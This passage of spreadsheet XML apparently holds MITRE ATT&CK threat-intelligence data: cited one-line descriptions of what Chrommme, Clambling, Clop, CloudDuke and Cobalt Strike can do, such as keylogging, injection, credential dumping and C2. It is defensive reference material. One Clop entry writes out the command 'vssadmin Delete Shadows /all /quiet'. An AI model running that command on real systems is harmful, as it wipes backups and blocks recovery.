    <t>[Chrommme](https://attack.mitre.org/software/S0667) has the ability to capture screenshots.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--9532ee14-8d66-41c1-855a-209fbb3ee3af</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) has the ability to list drives and obtain the computer name of a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--52f3a62b-621b-4cef-86f6-8152fa719473</t>
  </si>
  <si>
    <t>03 May 2022</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can enumerate the IP address of a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5</t>
  </si>
  <si>
    <t>[Chrommme](https://attack.mitre.org/software/S0667) can retrieve the username from a targeted system.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--e6e95c9e-0f7d-4611-a40a-95fd7ee9f206</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to use Telnet for communication.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--924d69bd-a87f-4fda-a2cb-73355331aa87</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can use Dropbox to download malicious payloads, send commands, and receive information.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--17d85f51-c89f-440c-be28-5f74d9264723</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to bypass UAC using a `passuac.dll` file.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--c4734977-e231-46cd-91c8-ce4be580d543</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture and store clipboard data.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--744da30b-d540-4512-85c7-d32310e2aa78</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</si>
  <si>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</si>
  <si>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relationship--f044fed9-e7d4-4cb2-938b-d89fd8b0c06c</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can collect information from a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--ec8c7897-1e29-4a55-b212-3dce350a8ad8</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can deobfuscate its payload prior to execution.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--ae788f2a-e2d8-4615-8714-f1263c987b23</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can send files from a victim's machine to Dropbox.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--43300665-e487-470f-a3ec-2aaeb76b2a5f</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can browse directories on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--292fd2a5-45fa-4125-84ea-8b5f341dc579</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to set its file attributes to hidden.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--11180322-a9e0-4f20-94e1-d47f95db06f8</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can capture keystrokes on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--96f31a7f-76d9-4aa6-81b7-cc4656213657</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has gained execution through luring victims into opening malicious files.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--3db909a5-8ae8-4ab4-9aa9-910e90155cf3</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can set and delete Registry keys.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--bef96df2-cc94-414d-8144-4c4875c59751</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to enumerate network shares.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--8e744873-e85e-4b7c-b36c-96448e600c43</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to use TCP and UDP for communication.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--0b932e1a-e0a1-4123-bcfe-6957b9ef2409</t>
  </si>
  <si>
    <t>The [Clambling](https://attack.mitre.org/software/S0660) executable has been obfuscated when dropped on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--57c72f80-38bf-48b4-9f5d-eefef4025e34</t>
  </si>
  <si>
    <t>The [Clambling](https://attack.mitre.org/software/S0660) dropper can use PowerShell to download the malware.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--df7d9316-0cf4-4f20-9169-f4952478cc60</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can enumerate processes on a targeted system.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--b0147ed6-a725-4899-82dd-4675aeecbd72</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can execute binaries through process hollowing.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--a821988a-269f-452b-ab59-5cbb3357f2f6</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can inject into the `svchost.exe` process for execution.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--666f1286-c25b-49ef-9d86-42a00ea69ab1</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</si>
  <si>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</si>
  <si>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relationship--27f4a7f3-7086-471d-8826-7bc544069c44</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can establish persistence by adding a Registry run key.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--3777379a-469f-453e-a270-450c8b1eba9b</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture screenshots.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--1957974e-1995-4d35-a32b-e355ae219ff8</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can create and start services on a compromised host.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--5c0b2098-6f0d-4c99-ac9d-bb3ea4ca9d52</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has been delivered to victim's machines through malicious e-mail attachments.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--67f3f607-8c27-4a90-b1bf-e84f75815a42</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can discover the hostname, computer name, and Windows version of a targeted machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--8b4c7113-2f11-44a7-863d-1ff49ae64215</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can enumerate the IP address of a compromised machine.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--e5543556-e531-4c9a-aab1-31a18a7ed5f8</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can identify the username on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--dd06865b-d8fa-4626-8ebd-e75289377c4c</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can determine the current time.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--b6f54741-1424-4a3c-b83e-1c94df063186</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can wait 30 minutes before initiating contact with C2.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--26802b94-95bf-4d01-a552-81069e62131a</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can record screen content in AVI format.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--07939f42-c9ce-442f-a922-6c3560ac5ddc</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) has the ability to communicate over HTTP.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--c3c323ed-e3db-495c-b9b4-c00ada5a37fe</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can use cmd.exe for command execution.(Citation: Trend Micro DRBControl February 2020)</t>
  </si>
  <si>
    <t>relationship--873b5347-7147-46fc-b94c-5b6deaeb56f4</t>
  </si>
  <si>
    <t>[Clambling](https://attack.mitre.org/software/S0660) can register itself as a system service to gain persistence.(Citation: Talent-Jump Clambling February 2020)</t>
  </si>
  <si>
    <t>relationship--cc7f6dcb-dae0-401b-ba21-158c040c717e</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can use code signing to evade detection.(Citation: Unit42 Clop April 2021)</t>
  </si>
  <si>
    <t>relationship--a31e890a-074c-4452-95cb-b6cda3e9cbdd</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can encrypt files using AES, RSA, and RC4 and will add the ".clop" extension to encrypted files.(Citation: Mcafee Clop Aug 2019)(Citation: Unit42 Clop April 2021)(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>relationship--c7daa7ca-ca5a-4940-a370-d9eccb8f3c9a</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used a simple XOR operation to decrypt strings.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>relationship--0e3d54bf-90de-450d-af1c-c4372488b4f8</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can uninstall or disable security products.(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>relationship--4046dc5c-822c-4c6b-9f1f-944fd0f760c6</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has searched folders and subfolders for files to encrypt.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>relationship--7e836d44-0047-4192-81fd-6fb8ff0cdbda</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can delete the shadow volumes with &lt;code&gt;vssadmin Delete Shadows /all /quiet&lt;/code&gt; and can use bcdedit to disable recovery options.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>relationship--bc733ee6-f441-42b1-a201-9ff84e0f522c</t>
  </si>
  <si>
    <t>19 May 2021</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can make modifications to Registry keys.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>relationship--a5c59466-b7ac-44a0-804d-cdfbc88c8fba</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can use msiexec.exe to disable security tools on the system.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>relationship--fd1836cc-0329-4501-812a-676dd234679e</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>relationship--16632684-1ef3-41bb-9ef1-97c6c3294448</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can enumerate network shares.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>relationship--b8e128df-429d-4a98-9b34-b179272a8344</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can enumerate all processes on the victim's machine.(Citation: Mcafee Clop Aug 2019)</t>
  </si>
  <si>
    <t>relationship--83089e74-f35d-4b1d-9036-4e49edd82bd0</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) can search for processes with antivirus and antimalware product names.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>relationship--0481e814-434a-4736-80f3-f8bbcad3faf2</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can kill several processes and services related to backups and security solutions.(Citation: Unit42 Clop April 2021)(Citation: Mcafee Clop Aug 2019) </t>
  </si>
  <si>
    <t>relationship--056d19a6-8f3c-48a6-a459-69394e39fb9a</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has been packed to help avoid detection.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)</t>
  </si>
  <si>
    <t>relationship--68067ea4-1d06-4c3d-bee2-2c59f43d41f4</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</si>
  <si>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</si>
  <si>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relationship--7a64941e-c585-4ded-b0d7-2d7f3d71eaa8</t>
  </si>
  <si>
    <t>[Clop](https://attack.mitre.org/software/S0611) has used the &lt;code&gt;sleep&lt;/code&gt; command to avoid sandbox detection.(Citation: Unit42 Clop April 2021)</t>
  </si>
  <si>
    <t>relationship--1fb2a0f2-5d60-4b72-9d18-5d5d06d0c2fe</t>
  </si>
  <si>
    <t xml:space="preserve">[Clop](https://attack.mitre.org/software/S0611) can use cmd.exe to help execute commands on the system.(Citation: Cybereason Clop Dec 2020) </t>
  </si>
  <si>
    <t>relationship--a164dce2-be0a-487b-bbe4-185843d36c6f</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--5ebd97d4-1979-40b2-b38b-b6ed44a2f32f</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--800825f5-6e74-43ad-a732-476fdf471225</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>relationship--41edf1d6-15a7-4da5-9bfd-ebee9d53f71e</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--a3aa78fe-28c9-44e8-a0a3-0f84c087b5e0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</si>
  <si>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</si>
  <si>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relationship--2d0748e3-7427-4847-9861-75680f6aacb3</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--ad7f635b-7775-4706-8577-eee00612c996</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a number of known techniques to bypass Windows UAC.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--126ecc74-4376-4909-9f75-a0630e47cb68</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--00e99176-c74e-4f49-a498-c66a71612a5b</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</si>
  <si>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</si>
  <si>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relationship--6a4ee5a3-9bc2-4352-856a-ae078ddc6cf2</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) will break large data sets into smaller chunks for exfiltration.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>relationship--98cc96c2-b876-4e1b-bec9-cb7ea8a8e532</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can collect data from a local system.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--22e84b06-fbac-4811-b9b7-3c6587aab7d7</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deobfuscate shellcode using a rolling XOR and decrypt metadata from Beacon sessions.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--b1065110-5387-4dee-b27e-f671d75f403f</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--240496c0-5e33-47e1-b422-b05a18f4ec2d</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver Beacon payloads for lateral movement by leveraging remote COM execution.(Citation: Cobalt Strike DCOM Jan 2017)</t>
  </si>
  <si>
    <t>relationship--e1a8fd78-3712-4951-8ebc-af5fe271295d</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>relationship--909db543-0968-4f02-b1d9-de64c0730c0a</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a domain user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--0fee0f43-7352-4503-867b-ae17eb7c278b</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to accept a value for HTTP Host Header to enable domain fronting.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--0023f0a7-26ae-40ec-ac6e-9dacf5217fb9</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can identify targets by querying account groups on a domain contoller.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--4af77ee9-ee38-4594-81e3-177a2f2d4bfb</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to load DLLs via reflective injection.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--249897d9-131f-4cf8-93d7-cb20006a511d</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--de676fc0-0b1f-4392-a84b-f412c660d89a</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit vulnerabilities such as MS14-058.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--412a57f3-ce06-4790-8e3a-cb8c34b9e0f1</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--d979fd42-450e-4bd3-a6f8-74b8c8f8fb7b</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can explore files on a compromised system.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--6747d237-8156-453c-9751-3afd1b36bdca</t>
  </si>
  <si>
    <t>18 May 2021</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) includes a capability to modify the Beacon payload to eliminate known signatures or unpacking methods.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--10b3228c-b96b-4a34-8da8-4d1fd3fa37d0</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver additional payloads to victim machines.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--cecb2ce6-cb40-453d-9487-9f59f156a98c</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</si>
  <si>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</si>
  <si>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relationship--406ca789-682f-4e08-bb7e-60421923ee09</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can use JavaScript to perform reconnaissance actions.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--072552be-9c74-4ee8-972c-46454a2c78c0</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can track key presses with a keylogger module.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--2aa0dea4-ca6d-4095-8c20-9250308c3315</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn a job to inject into LSASS memory and dump password hashes.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--82a7e330-e4b1-4db8-8c73-03cabd9b8991</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>relationship--3a2883ee-60fb-4123-9d82-9ade53f4b43b</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;net localgroup&lt;/code&gt; to list local groups on a system.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--72e0dd03-d994-4a38-97a8-dab5ae456cbc</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can make tokens from known credentials.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>relationship--dd900d1e-ef80-4e35-9cf3-53653babf346</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</si>
  <si>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</si>
  <si>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relationship--45376fe9-2a43-4e09-942e-82be661ed572</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</si>
  <si>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</si>
  <si>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relationship--095bfdd3-2379-4cad-bef4-53e8bdd08a75</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform port scans from an infected host.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--98e08749-5e7b-40ed-8a66-cd33f9c8c6ba</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query shared drives on the local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>relationship--a106b02a-0a6a-493f-911c-a00576013004</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to use TCP, ICMP, and UDP for C2 communications.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--c904b6b7-52f4-42fe-b921-bb5a490c0c3f</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>relationship--f7232e30-bc04-476a-871a-5048a0ada06c</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn processes with alternate PPIDs.(Citation: CobaltStrike Daddy May 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--538e4202-41cf-4d4e-9c1c-30df5bc30a22</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform pass the hash.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>relationship--0f5b5d67-44f6-4725-951e-ce614385c361</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</si>
  <si>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</si>
  <si>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relationship--7396dd25-432c-4285-8149-1237b1273a53</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use spoof arguments in spawned processes that execute beacon commands.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--41b8a7b7-0134-412d-85d7-3a0141beb8e2</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload can collect information on process details.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--ecf30cb0-3183-4ed4-bb33-da604ea6a65e</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use process hollowing for execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--315cd644-875d-4761-b440-f2cf48badbe0</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can inject a variety of payloads into processes dynamically chosen by the adversary.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>relationship--5ebc97a3-54ee-4582-92ce-981f67c26f45</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--5179f874-72fb-4743-bd51-3f3fdb660038</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</si>
  <si>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</si>
  <si>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relationship--b6f52beb-1be0-4607-86a6-977d34fabe54</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Python to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--d9ed5493-1610-4f65-bd2e-527b97bde8bf</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</si>
  <si>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</si>
  <si>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relationship--8e12d3f8-6c2b-4622-889e-63c9abcff04b</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s &lt;code&gt;execute-assembly&lt;/code&gt; command can run a .NET executable within the memory of a sacrificial process by loading the CLR.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--79c5870a-c93f-47c5-a382-e26a23666209</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.(Citation: cobaltstrike manual)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>relationship--094a2284-eeab-47fd-b6fb-6351d98330aa</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</si>
  <si>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</si>
  <si>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relationship--80299c96-9450-48bc-8161-e72a41389f6a</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use `rundll32.exe` to load DLL from the command line.(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--d4e351be-ccdc-4c51-a52a-b4d6a55cbeca</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Window admin shares (C$ and ADMIN$) for lateral movement.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--d486dd75-bb96-44e6-9898-c256b9f1b8ba</t>
  </si>
  <si>
